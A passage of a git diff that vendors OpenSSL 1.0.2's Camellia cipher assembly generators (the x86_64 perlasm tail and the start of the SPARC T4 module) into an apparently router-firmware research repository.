+	mov	-4($key),$t0
+
+___
+	for ($i=0;$i<6;$i++) { Camellia_Feistel($i,-8); }
+$code.=<<___;
+	lea	-16*4($key),$key
+	cmp	$keyend,$key
+	mov	0($key),$t3		# prefetch key[2-3]
+	mov	4($key),$t2
+	je	.Lddone
+
+	and	@S[0],$t0
+	or	@S[3],$t3
+	rol	\$1,$t0
+	xor	$t3,@S[2]		# s2^=s3|key[3];
+	xor	$t0,@S[1]		# s1^=LeftRotate(s0&key[0],1);
+	and	@S[2],$t2
+	or	@S[1],$t1
+	rol	\$1,$t2
+	xor	$t1,@S[0]		# s0^=s1|key[1];
+	xor	$t2,@S[3]		# s3^=LeftRotate(s2&key[2],1);
+
+	jmp	.Ldloop
+
+.align	16
+.Lddone:
+	xor	@S[2],$t2
+	xor	@S[3],$t3
+	xor	@S[0],$t0
+	xor	@S[1],$t1
+
+	mov	$t2,@S[0]		# SwapHalf
+	mov	$t3,@S[1]
+	mov	$t0,@S[2]
+	mov	$t1,@S[3]
+
+	.byte	0xf3,0xc3		# rep ret
+.size	_x86_64_Camellia_decrypt,.-_x86_64_Camellia_decrypt
+___
+
+sub _saveround {
+my ($rnd,$key,@T)=@_;
+my $bias=int(@T[0])?shift(@T):0;
+
+    if ($#T==3) {
+	$code.=<<___;
+	mov	@T[1],`$bias+$rnd*8+0`($key)
+	mov	@T[0],`$bias+$rnd*8+4`($key)
+	mov	@T[3],`$bias+$rnd*8+8`($key)
+	mov	@T[2],`$bias+$rnd*8+12`($key)
+___
+    } else {
+	$code.="	mov	@T[0],`$bias+$rnd*8+0`($key)\n";
+	$code.="	mov	@T[1],`$bias+$rnd*8+8`($key)\n"	if ($#T>=1);
+    }
+}
+
+sub _loadround {
+my ($rnd,$key,@T)=@_;
+my $bias=int(@T[0])?shift(@T):0;
+
+$code.="	mov	`$bias+$rnd*8+0`($key),@T[0]\n";
+$code.="	mov	`$bias+$rnd*8+8`($key),@T[1]\n"	if ($#T>=1);
+}
+
+# shld is very slow on Intel EM64T family. Even on AMD it limits
+# instruction decode rate [because it's VectorPath] and consequently
+# performance...
+sub __rotl128 {
+my ($i0,$i1,$rot)=@_;
+
+    if ($rot) {
+	$code.=<<___;
+	mov	$i0,%r11
+	shld	\$$rot,$i1,$i0
+	shld	\$$rot,%r11,$i1
+___
+    }
+}
+
+# ... Implementing 128-bit rotate without shld gives 80% better
+# performance EM64T, +15% on AMD64 and only ~7% degradation on
+# Core2. This is therefore preferred.
+sub _rotl128 {
+my ($i0,$i1,$rot)=@_;
+
+    if ($rot) {
+	$code.=<<___;
+	mov	$i0,%r11
+	shl	\$$rot,$i0
+	mov	$i1,%r9
+	shr	\$`64-$rot`,%r9
+	shr	\$`64-$rot`,%r11
+	or	%r9,$i0
+	shl	\$$rot,$i1
+	or	%r11,$i1
+___
+    }
+}
+
+{ my $step=0;
+
+$code.=<<___;
+.globl	Camellia_Ekeygen
+.type	Camellia_Ekeygen,\@function,3
+.align	16
+Camellia_Ekeygen:
+	push	%rbx
+	push	%rbp
+	push	%r13
+	push	%r14
+	push	%r15
+.Lkey_prologue:
+
+	mov	%edi,${keyend}d		# put away arguments, keyBitLength
+	mov	%rdx,$out		# keyTable
+
+	mov	0(%rsi),@S[0]		# load 0-127 bits
+	mov	4(%rsi),@S[1]
+	mov	8(%rsi),@S[2]
+	mov	12(%rsi),@S[3]
+
+	bswap	@S[0]
+	bswap	@S[1]
+	bswap	@S[2]
+	bswap	@S[3]
+___
+	&_saveround	(0,$out,@S);	# KL<<<0
+$code.=<<___;
+	cmp	\$128,$keyend		# check keyBitLength
+	je	.L1st128
+
+	mov	16(%rsi),@S[0]		# load 128-191 bits
+	mov	20(%rsi),@S[1]
+	cmp	\$192,$keyend
+	je	.L1st192
+	mov	24(%rsi),@S[2]		# load 192-255 bits
+	mov	28(%rsi),@S[3]
+	jmp	.L1st256
+.L1st192:
+	mov	@S[0],@S[2]
+	mov	@S[1],@S[3]
+	not	@S[2]
+	not	@S[3]
+.L1st256:
+	bswap	@S[0]
+	bswap	@S[1]
+	bswap	@S[2]
+	bswap	@S[3]
+___
+	&_saveround	(4,$out,@S);	# temp storage for KR!
+$code.=<<___;
+	xor	0($out),@S[1]		# KR^KL
+	xor	4($out),@S[0]
+	xor	8($out),@S[3]
+	xor	12($out),@S[2]
+
+.L1st128:
+	lea	.LCamellia_SIGMA(%rip),$key
+	lea	.LCamellia_SBOX(%rip),$Tbl
+
+	mov	0($key),$t1
+	mov	4($key),$t0
+___
+	&Camellia_Feistel($step++);
+	&Camellia_Feistel($step++);
+$code.=<<___;
+	xor	0($out),@S[1]		# ^KL
+	xor	4($out),@S[0]
+	xor	8($out),@S[3]
+	xor	12($out),@S[2]
+___
+	&Camellia_Feistel($step++);
+	&Camellia_Feistel($step++);
+$code.=<<___;
+	cmp	\$128,$keyend
+	jne	.L2nd256
+
+	lea	128($out),$out		# size optimization
+	shl	\$32,%r8		# @S[0]||
+	shl	\$32,%r10		# @S[2]||
+	or	%r9,%r8			# ||@S[1]
+	or	%r11,%r10		# ||@S[3]
+___
+	&_loadround	(0,$out,-128,"%rax","%rbx");	# KL
+	&_saveround	(2,$out,-128,"%r8","%r10");	# KA<<<0
+	&_rotl128	("%rax","%rbx",15);
+	&_saveround	(4,$out,-128,"%rax","%rbx");	# KL<<<15
+	&_rotl128	("%r8","%r10",15);
+	&_saveround	(6,$out,-128,"%r8","%r10");	# KA<<<15
+	&_rotl128	("%r8","%r10",15);		# 15+15=30
+	&_saveround	(8,$out,-128,"%r8","%r10");	# KA<<<30
+	&_rotl128	("%rax","%rbx",30);		# 15+30=45
+	&_saveround	(10,$out,-128,"%rax","%rbx");	# KL<<<45
+	&_rotl128	("%r8","%r10",15);		# 30+15=45
+	&_saveround	(12,$out,-128,"%r8");		# KA<<<45
+	&_rotl128	("%rax","%rbx",15);		# 45+15=60
+	&_saveround	(13,$out,-128,"%rbx");		# KL<<<60
+	&_rotl128	("%r8","%r10",15);		# 45+15=60
+	&_saveround	(14,$out,-128,"%r8","%r10");	# KA<<<60
+	&_rotl128	("%rax","%rbx",17);		# 60+17=77
+	&_saveround	(16,$out,-128,"%rax","%rbx");	# KL<<<77
+	&_rotl128	("%rax","%rbx",17);		# 77+17=94
+	&_saveround	(18,$out,-128,"%rax","%rbx");	# KL<<<94
+	&_rotl128	("%r8","%r10",34);		# 60+34=94
+	&_saveround	(20,$out,-128,"%r8","%r10");	# KA<<<94
+	&_rotl128	("%rax","%rbx",17);		# 94+17=111
+	&_saveround	(22,$out,-128,"%rax","%rbx");	# KL<<<111
+	&_rotl128	("%r8","%r10",17);		# 94+17=111
+	&_saveround	(24,$out,-128,"%r8","%r10");	# KA<<<111
+$code.=<<___;
+	mov	\$3,%eax
+	jmp	.Ldone
+.align	16
+.L2nd256:
+___
+	&_saveround	(6,$out,@S);	# temp storage for KA!
+$code.=<<___;
+	xor	`4*8+0`($out),@S[1]	# KA^KR
+	xor	`4*8+4`($out),@S[0]
+	xor	`5*8+0`($out),@S[3]
+	xor	`5*8+4`($out),@S[2]
+___
+	&Camellia_Feistel($step++);
+	&Camellia_Feistel($step++);
+
+	&_loadround	(0,$out,"%rax","%rbx");	# KL
+	&_loadround	(4,$out,"%rcx","%rdx");	# KR
+	&_loadround	(6,$out,"%r14","%r15");	# KA
+$code.=<<___;
+	lea	128($out),$out		# size optimization
+	shl	\$32,%r8		# @S[0]||
+	shl	\$32,%r10		# @S[2]||
+	or	%r9,%r8			# ||@S[1]
+	or	%r11,%r10		# ||@S[3]
+___
+	&_saveround	(2,$out,-128,"%r8","%r10");	# KB<<<0
+	&_rotl128	("%rcx","%rdx",15);
+	&_saveround	(4,$out,-128,"%rcx","%rdx");	# KR<<<15
+	&_rotl128	("%r14","%r15",15);
+	&_saveround	(6,$out,-128,"%r14","%r15");	# KA<<<15
+	&_rotl128	("%rcx","%rdx",15);		# 15+15=30
+	&_saveround	(8,$out,-128,"%rcx","%rdx");	# KR<<<30
+	&_rotl128	("%r8","%r10",30);
+	&_saveround	(10,$out,-128,"%r8","%r10");	# KB<<<30
+	&_rotl128	("%rax","%rbx",45);
+	&_saveround	(12,$out,-128,"%rax","%rbx");	# KL<<<45
+	&_rotl128	("%r14","%r15",30);		# 15+30=45
+	&_saveround	(14,$out,-128,"%r14","%r15");	# KA<<<45
+	&_rotl128	("%rax","%rbx",15);		# 45+15=60
+	&_saveround	(16,$out,-128,"%rax","%rbx");	# KL<<<60
+	&_rotl128	("%rcx","%rdx",30);		# 30+30=60
+	&_saveround	(18,$out,-128,"%rcx","%rdx");	# KR<<<60
+	&_rotl128	("%r8","%r10",30);		# 30+30=60
+	&_saveround	(20,$out,-128,"%r8","%r10");	# KB<<<60
+	&_rotl128	("%rax","%rbx",17);		# 60+17=77
+	&_saveround	(22,$out,-128,"%rax","%rbx");	# KL<<<77
+	&_rotl128	("%r14","%r15",32);		# 45+32=77
+	&_saveround	(24,$out,-128,"%r14","%r15");	# KA<<<77
+	&_rotl128	("%rcx","%rdx",34);		# 60+34=94
+	&_saveround	(26,$out,-128,"%rcx","%rdx");	# KR<<<94
+	&_rotl128	("%r14","%r15",17);		# 77+17=94
+	&_saveround	(28,$out,-128,"%r14","%r15");	# KA<<<77
+	&_rotl128	("%rax","%rbx",34);		# 77+34=111
+	&_saveround	(30,$out,-128,"%rax","%rbx");	# KL<<<111
+	&_rotl128	("%r8","%r10",51);		# 60+51=111
+	&_saveround	(32,$out,-128,"%r8","%r10");	# KB<<<111
+$code.=<<___;
+	mov	\$4,%eax
+.Ldone:
+	mov	0(%rsp),%r15
+	mov	8(%rsp),%r14
+	mov	16(%rsp),%r13
+	mov	24(%rsp),%rbp
+	mov	32(%rsp),%rbx
+	lea	40(%rsp),%rsp
+.Lkey_epilogue:
+	ret
+.size	Camellia_Ekeygen,.-Camellia_Ekeygen
+___
+}
+
+@SBOX=(
+112,130, 44,236,179, 39,192,229,228,133, 87, 53,234, 12,174, 65,
+ 35,239,107,147, 69, 25,165, 33,237, 14, 79, 78, 29,101,146,189,
+134,184,175,143,124,235, 31,206, 62, 48,220, 95, 94,197, 11, 26,
+166,225, 57,202,213, 71, 93, 61,217,  1, 90,214, 81, 86,108, 77,
+139, 13,154,102,251,204,176, 45,116, 18, 43, 32,240,177,132,153,
+223, 76,203,194, 52,126,118,  5,109,183,169, 49,209, 23,  4,215,
+ 20, 88, 58, 97,222, 27, 17, 28, 50, 15,156, 22, 83, 24,242, 34,
+254, 68,207,178,195,181,122,145, 36,  8,232,168, 96,252,105, 80,
+170,208,160,125,161,137, 98,151, 84, 91, 30,149,224,255,100,210,
+ 16,196,  0, 72,163,247,117,219,138,  3,230,218,  9, 63,221,148,
+135, 92,131,  2,205, 74,144, 51,115,103,246,243,157,127,191,226,
+ 82,155,216, 38,200, 55,198, 59,129,150,111, 75, 19,190, 99, 46,
+233,121,167,140,159,110,188,142, 41,245,249,182, 47,253,180, 89,
+120,152,  6,106,231, 70,113,186,212, 37,171, 66,136,162,141,250,
+114,  7,185, 85,248,238,172, 10, 54, 73, 42,104, 60, 56,241,164,
+ 64, 40,211,123,187,201, 67,193, 21,227,173,244,119,199,128,158);
+
+sub S1110 { my $i=shift; $i=@SBOX[$i]; $i=$i<<24|$i<<16|$i<<8; sprintf("0x%08x",$i); }
+sub S4404 { my $i=shift; $i=($i<<1|$i>>7)&0xff; $i=@SBOX[$i]; $i=$i<<24|$i<<16|$i; sprintf("0x%08x",$i); }
+sub S0222 { my $i=shift; $i=@SBOX[$i]; $i=($i<<1|$i>>7)&0xff; $i=$i<<16|$i<<8|$i; sprintf("0x%08x",$i); }
+sub S3033 { my $i=shift; $i=@SBOX[$i]; $i=($i>>1|$i<<7)&0xff; $i=$i<<24|$i<<8|$i; sprintf("0x%08x",$i); }
+
+$code.=<<___;
+.align	64
+.LCamellia_SIGMA:
+.long	0x3bcc908b, 0xa09e667f, 0x4caa73b2, 0xb67ae858
+.long	0xe94f82be, 0xc6ef372f, 0xf1d36f1c, 0x54ff53a5
+.long	0xde682d1d, 0x10e527fa, 0xb3e6c1fd, 0xb05688c2
+.long	0,          0,          0,          0
+.LCamellia_SBOX:
+___
+# tables are interleaved, remember?
+sub data_word { $code.=".long\t".join(',',@_)."\n"; }
+for ($i=0;$i<256;$i++) { &data_word(&S1110($i),&S4404($i)); }
+for ($i=0;$i<256;$i++) { &data_word(&S0222($i),&S3033($i)); }
+
+# void Camellia_cbc_encrypt (const void char *inp, unsigned char *out,
+#			size_t length, const CAMELLIA_KEY *key,
+#			unsigned char *ivp,const int enc);
+{
+$_key="0(%rsp)";
+$_end="8(%rsp)";	# inp+len&~15
+$_res="16(%rsp)";	# len&15
+$ivec="24(%rsp)";
+$_ivp="40(%rsp)";
+$_rsp="48(%rsp)";
+
+$code.=<<___;
+.globl	Camellia_cbc_encrypt
+.type	Camellia_cbc_encrypt,\@function,6
+.align	16
+Camellia_cbc_encrypt:
+	cmp	\$0,%rdx
+	je	.Lcbc_abort
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+.Lcbc_prologue:
+
+	mov	%rsp,%rbp
+	sub	\$64,%rsp
+	and	\$-64,%rsp
+
+	# place stack frame just "above mod 1024" the key schedule,
+	# this ensures that cache associativity suffices
+	lea	-64-63(%rcx),%r10
+	sub	%rsp,%r10
+	neg	%r10
+	and	\$0x3C0,%r10
+	sub	%r10,%rsp
+	#add	\$8,%rsp		# 8 is reserved for callee's ra
+
+	mov	%rdi,$inp		# inp argument
+	mov	%rsi,$out		# out argument
+	mov	%r8,%rbx		# ivp argument
+	mov	%rcx,$key		# key argument
+	mov	272(%rcx),${keyend}d	# grandRounds
+
+	mov	%r8,$_ivp
+	mov	%rbp,$_rsp
+
+.Lcbc_body:
+	lea	.LCamellia_SBOX(%rip),$Tbl
+
+	mov	\$32,%ecx
+.align	4
+.Lcbc_prefetch_sbox:
+	mov	0($Tbl),%rax
+	mov	32($Tbl),%rsi
+	mov	64($Tbl),%rdi
+	mov	96($Tbl),%r11
+	lea	128($Tbl),$Tbl
+	loop	.Lcbc_prefetch_sbox
+	sub	\$4096,$Tbl
+	shl	\$6,$keyend
+	mov	%rdx,%rcx		# len argument
+	lea	($key,$keyend),$keyend
+
+	cmp	\$0,%r9d		# enc argument
+	je	.LCBC_DECRYPT
+
+	and	\$-16,%rdx
+	and	\$15,%rcx		# length residue
+	lea	($inp,%rdx),%rdx
+	mov	$key,$_key
+	mov	%rdx,$_end
+	mov	%rcx,$_res
+
+	cmp	$inp,%rdx
+	mov	0(%rbx),@S[0]		# load IV
+	mov	4(%rbx),@S[1]
+	mov	8(%rbx),@S[2]
+	mov	12(%rbx),@S[3]
+	je	.Lcbc_enc_tail
+	jmp	.Lcbc_eloop
+
+.align	16
+.Lcbc_eloop:
+	xor	0($inp),@S[0]
+	xor	4($inp),@S[1]
+	xor	8($inp),@S[2]
+	bswap	@S[0]
+	xor	12($inp),@S[3]
+	bswap	@S[1]
+	bswap	@S[2]
+	bswap	@S[3]
+
+	call	_x86_64_Camellia_encrypt
+
+	mov	$_key,$key		# "rewind" the key
+	bswap	@S[0]
+	mov	$_end,%rdx
+	bswap	@S[1]
+	mov	$_res,%rcx
+	bswap	@S[2]
+	mov	@S[0],0($out)
+	bswap	@S[3]
+	mov	@S[1],4($out)
+	mov	@S[2],8($out)
+	lea	16($inp),$inp
+	mov	@S[3],12($out)
+	cmp	%rdx,$inp
+	lea	16($out),$out
+	jne	.Lcbc_eloop
+
+	cmp	\$0,%rcx
+	jne	.Lcbc_enc_tail
+
+	mov	$_ivp,$out
+	mov	@S[0],0($out)		# write out IV residue
+	mov	@S[1],4($out)
+	mov	@S[2],8($out)
+	mov	@S[3],12($out)
+	jmp	.Lcbc_done
+
+.align	16
+.Lcbc_enc_tail:
+	xor	%rax,%rax
+	mov	%rax,0+$ivec
+	mov	%rax,8+$ivec
+	mov	%rax,$_res
+
+.Lcbc_enc_pushf:
+	pushfq
+	cld
+	mov	$inp,%rsi
+	lea	8+$ivec,%rdi
+	.long	0x9066A4F3		# rep movsb
+	popfq
+.Lcbc_enc_popf:
+
+	lea	$ivec,$inp
+	lea	16+$ivec,%rax
+	mov	%rax,$_end
+	jmp	.Lcbc_eloop		# one more time
+
+.align	16
+.LCBC_DECRYPT:
+	xchg	$key,$keyend
+	add	\$15,%rdx
+	and	\$15,%rcx		# length residue
+	and	\$-16,%rdx
+	mov	$key,$_key
+	lea	($inp,%rdx),%rdx
+	mov	%rdx,$_end
+	mov	%rcx,$_res
+
+	mov	(%rbx),%rax		# load IV
+	mov	8(%rbx),%rbx
+	jmp	.Lcbc_dloop
+.align	16
+.Lcbc_dloop:
+	mov	0($inp),@S[0]
+	mov	4($inp),@S[1]
+	mov	8($inp),@S[2]
+	bswap	@S[0]
+	mov	12($inp),@S[3]
+	bswap	@S[1]
+	mov	%rax,0+$ivec		# save IV to temporary storage
+	bswap	@S[2]
+	mov	%rbx,8+$ivec
+	bswap	@S[3]
+
+	call	_x86_64_Camellia_decrypt
+
+	mov	$_key,$key		# "rewind" the key
+	mov	$_end,%rdx
+	mov	$_res,%rcx
+
+	bswap	@S[0]
+	mov	($inp),%rax		# load IV for next iteration
+	bswap	@S[1]
+	mov	8($inp),%rbx
+	bswap	@S[2]
+	xor	0+$ivec,@S[0]
+	bswap	@S[3]
+	xor	4+$ivec,@S[1]
+	xor	8+$ivec,@S[2]
+	lea	16($inp),$inp
+	xor	12+$ivec,@S[3]
+	cmp	%rdx,$inp
+	je	.Lcbc_ddone
+
+	mov	@S[0],0($out)
+	mov	@S[1],4($out)
+	mov	@S[2],8($out)
+	mov	@S[3],12($out)
+
+	lea	16($out),$out
+	jmp	.Lcbc_dloop
+
+.align	16
+.Lcbc_ddone:
+	mov	$_ivp,%rdx
+	cmp	\$0,%rcx
+	jne	.Lcbc_dec_tail
+
+	mov	@S[0],0($out)
+	mov	@S[1],4($out)
+	mov	@S[2],8($out)
+	mov	@S[3],12($out)
+
+	mov	%rax,(%rdx)		# write out IV residue
+	mov	%rbx,8(%rdx)
+	jmp	.Lcbc_done
+.align	16
+.Lcbc_dec_tail:
+	mov	@S[0],0+$ivec
+	mov	@S[1],4+$ivec
+	mov	@S[2],8+$ivec
+	mov	@S[3],12+$ivec
+
+.Lcbc_dec_pushf:
+	pushfq
+	cld
+	lea	8+$ivec,%rsi
+	lea	($out),%rdi
+	.long	0x9066A4F3		# rep movsb
+	popfq
+.Lcbc_dec_popf:
+
+	mov	%rax,(%rdx)		# write out IV residue
+	mov	%rbx,8(%rdx)
+	jmp	.Lcbc_done
+
+.align	16
+.Lcbc_done:
+	mov	$_rsp,%rcx
+	mov	0(%rcx),%r15
+	mov	8(%rcx),%r14
+	mov	16(%rcx),%r13
+	mov	24(%rcx),%r12
+	mov	32(%rcx),%rbp
+	mov	40(%rcx),%rbx
+	lea	48(%rcx),%rsp
+.Lcbc_abort:
+	ret
+.size	Camellia_cbc_encrypt,.-Camellia_cbc_encrypt
+
+.asciz	"Camellia for x86_64 by <appro\@openssl.org>"
+___
+}
+
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	common_se_handler,\@abi-omnipotent
+.align	16
+common_se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	lea	-64(%rsp),%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# prologue label
+	cmp	%r10,%rbx		# context->Rip<prologue label
+	jb	.Lin_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lin_prologue
+
+	lea	40(%rax),%rax
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r13
+	mov	-32(%rax),%r14
+	mov	-40(%rax),%r15
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+
+.Lin_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	jmp	.Lcommon_seh_exit
+.size	common_se_handler,.-common_se_handler
+
+.type	cbc_se_handler,\@abi-omnipotent
+.align	16
+cbc_se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	lea	-64(%rsp),%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	lea	.Lcbc_prologue(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<.Lcbc_prologue
+	jb	.Lin_cbc_prologue
+
+	lea	.Lcbc_body(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<.Lcbc_body
+	jb	.Lin_cbc_frame_setup
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	lea	.Lcbc_abort(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip>=.Lcbc_abort
+	jae	.Lin_cbc_prologue
+
+	# handle pushf/popf in Camellia_cbc_encrypt
+	lea	.Lcbc_enc_pushf(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<=.Lcbc_enc_pushf
+	jbe	.Lin_cbc_no_flag
+	lea	8(%rax),%rax
+	lea	.Lcbc_enc_popf(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<.Lcbc_enc_popf
+	jb	.Lin_cbc_no_flag
+	lea	-8(%rax),%rax
+	lea	.Lcbc_dec_pushf(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<=.Lcbc_dec_pushf
+	jbe	.Lin_cbc_no_flag
+	lea	8(%rax),%rax
+	lea	.Lcbc_dec_popf(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<.Lcbc_dec_popf
+	jb	.Lin_cbc_no_flag
+	lea	-8(%rax),%rax
+
+.Lin_cbc_no_flag:
+	mov	48(%rax),%rax		# $_rsp
+	lea	48(%rax),%rax
+
+.Lin_cbc_frame_setup:
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r12
+	mov	-32(%rax),%r13
+	mov	-40(%rax),%r14
+	mov	-48(%rax),%r15
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+
+.Lin_cbc_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+.align	4
+.Lcommon_seh_exit:
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$`1232/8`,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	lea	64(%rsp),%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	cbc_se_handler,.-cbc_se_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_Camellia_EncryptBlock_Rounds
+	.rva	.LSEH_end_Camellia_EncryptBlock_Rounds
+	.rva	.LSEH_info_Camellia_EncryptBlock_Rounds
+
+	.rva	.LSEH_begin_Camellia_DecryptBlock_Rounds
+	.rva	.LSEH_end_Camellia_DecryptBlock_Rounds
+	.rva	.LSEH_info_Camellia_DecryptBlock_Rounds
+
+	.rva	.LSEH_begin_Camellia_Ekeygen
+	.rva	.LSEH_end_Camellia_Ekeygen
+	.rva	.LSEH_info_Camellia_Ekeygen
+
+	.rva	.LSEH_begin_Camellia_cbc_encrypt
+	.rva	.LSEH_end_Camellia_cbc_encrypt
+	.rva	.LSEH_info_Camellia_cbc_encrypt
+
+.section	.xdata
+.align	8
+.LSEH_info_Camellia_EncryptBlock_Rounds:
+	.byte	9,0,0,0
+	.rva	common_se_handler
+	.rva	.Lenc_prologue,.Lenc_epilogue	# HandlerData[]
+.LSEH_info_Camellia_DecryptBlock_Rounds:
+	.byte	9,0,0,0
+	.rva	common_se_handler
+	.rva	.Ldec_prologue,.Ldec_epilogue	# HandlerData[]
+.LSEH_info_Camellia_Ekeygen:
+	.byte	9,0,0,0
+	.rva	common_se_handler
+	.rva	.Lkey_prologue,.Lkey_epilogue	# HandlerData[]
+.LSEH_info_Camellia_cbc_encrypt:
+	.byte	9,0,0,0
+	.rva	cbc_se_handler
+___
+}
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/asm/cmllt4-sparcv9.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/asm/cmllt4-sparcv9.pl
new file mode 100644
index 0000000..a813168
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/asm/cmllt4-sparcv9.pl
@@ -0,0 +1,929 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by David S. Miller <davem@devemloft.net> and Andy Polyakov
+# <appro@openssl.org>. The module is licensed under 2-clause BSD
+# license. October 2012. All rights reserved.
+# ====================================================================
+
+######################################################################
+# Camellia for SPARC T4.
+#
+# As with AES below results [for aligned data] are virtually identical
+# to critical path lenths for 3-cycle instruction latency:
+#
+#		128-bit key	192/256-
+# CBC encrypt	4.14/4.21(*)	5.46/5.52
+#			 (*) numbers after slash are for
+#			     misaligned data.
+#
+# As with Intel AES-NI, question is if it's possible to improve
+# performance of parallelizeable modes by interleaving round
+# instructions. In Camellia every instruction is dependent on
+# previous, which means that there is place for 2 additional ones
+# in between two dependent. Can we expect 3x performance improvement?
+# At least one can argue that it should be possible to break 2x
+# barrier... For some reason not even 2x appears to be possible:
+#
+#		128-bit key	192/256-
+# CBC decrypt	2.21/2.74	2.99/3.40
+# CTR		2.15/2.68(*)	2.93/3.34
+#			 (*) numbers after slash are for
+#			     misaligned data.
+#
+# This is for 2x interleave. But compared to 1x interleave CBC decrypt
+# improved by ... 0% for 128-bit key, and 11% for 192/256-bit one.
+# So that out-of-order execution logic can take non-interleaved code
+# to 1.87x, but can't take 2x interleaved one any further. There
+# surely is some explanation... As result 3x interleave was not even
+# attempted. Instead an effort was made to share specific modes
+# implementations with AES module (therefore sparct4_modes.pl).
+#
+# To anchor to something else, software C implementation processes
+# one byte in 38 cycles with 128-bit key on same processor.
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "sparcv9_modes.pl";
+
+&asm_init(@ARGV);
+
+$::evp=1;	# if $evp is set to 0, script generates module with
+# Camellia_[en|de]crypt, Camellia_set_key and Camellia_cbc_encrypt
+# entry points. These are fully compatible with openssl/camellia.h.
+
+######################################################################
+# single-round subroutines
+#
+{
+my ($inp,$out,$key,$rounds,$tmp,$mask)=map("%o$_",(0..5));
+
+$code=<<___;
+.text
+
+.globl	cmll_t4_encrypt
+.align	32
+cmll_t4_encrypt:
+	andcc		$inp, 7, %g1		! is input aligned?
+	andn		$inp, 7, $inp
+
+	ldx		[$key + 0], %g4
+	ldx		[$key + 8], %g5
+
+	ldx		[$inp + 0], %o4
+	bz,pt		%icc, 1f
+	ldx		[$inp + 8], %o5
+	ldx		[$inp + 16], $inp
+	sll		%g1, 3, %g1
+	sub		%g0, %g1, %o3
+	sllx		%o4, %g1, %o4
+	sllx		%o5, %g1, %g1
+	srlx		%o5, %o3, %o5
+	srlx		$inp, %o3, %o3
+	or		%o5, %o4, %o4
+	or		%o3, %g1, %o5
+1:
+	ld		[$key + 272], $rounds	! grandRounds, 3 or 4
+	ldd		[$key + 16], %f12
+	ldd		[$key + 24], %f14
+	xor		%g4, %o4, %o4
+	xor		%g5, %o5, %o5
+	ldd		[$key + 32], %f16
